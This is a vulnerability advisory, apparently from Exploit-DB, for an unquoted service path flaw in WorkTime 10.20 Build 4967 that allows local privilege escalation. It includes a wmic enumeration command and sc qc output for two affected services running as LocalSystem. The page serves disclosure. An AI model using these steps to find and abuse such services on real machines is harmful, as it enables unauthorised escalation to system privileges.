WorkTime 10.20 Build 4967 - Unquoted Service Path

vendor:

WorkTime

by:

Yehia Elghaly

5.5

CVSS

MEDIUM

Unquoted Service Path

428

CWE

Product Name: WorkTime

Affected Version From: 10.20 Build 4967

Affected Version To: 10.20 Build 4967

Patch Exists: NO

Related CWE:

CPE: a:worktime:worktime:10.20:4967

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x86, Windows Server 2016 x64

2021

WorkTime 10.20 Build 4967 – Unquoted Service Path

The WorkTime software version 10.20 Build 4967 is affected by an unquoted service path vulnerability. The vulnerability allows an attacker with local access to escalate privileges and potentially execute arbitrary code.

Mitigation:

To mitigate this vulnerability, users are advised to update to the latest version of WorkTime software.

Source

Exploit-DB raw data:

# Exploit Title: WorkTime 10.20 Build 4967 - Unquoted Service Path
# Discovery by: Yehia Elghaly
# Date: 30-12-2021
# Vendor Homepage:  https://www.worktime.com/
# Software Link: https://www.worktime.com/download/worktime_corporate.exe
# Tested Version: 10.20 Build Build 4967
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 7 x86 - Windows Server 2016 x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """

WorkTime Server  srvWorkTimeServer  
C:\WorkTime\WorkTimeServerService.exe
Auto

WorkTime Reports Scheduler  WorkTimeReportsScheduler  
C:\Program Files\WorkTimeAdministrator\WorkTimeReportsScheduler.exe                            
Auto

WorkTime Client Watcher Service   WTCWatch 
C:\Program Files\wtc\WTCWatch.exe WTCWatch
Auto


C:\Users\psycho>sc qc  WorkTimeReportsScheduler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WorkTimeReportsScheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\WorkTimeAdministrator\WorkTimeRepo
rtsScheduler.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WorkTime Reports Scheduler
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\psycho>sc qc WTCWatch
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WTCWatch
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\wtc\WTCWatch.exe WTCWatch
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WorkTime Client Watcher Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem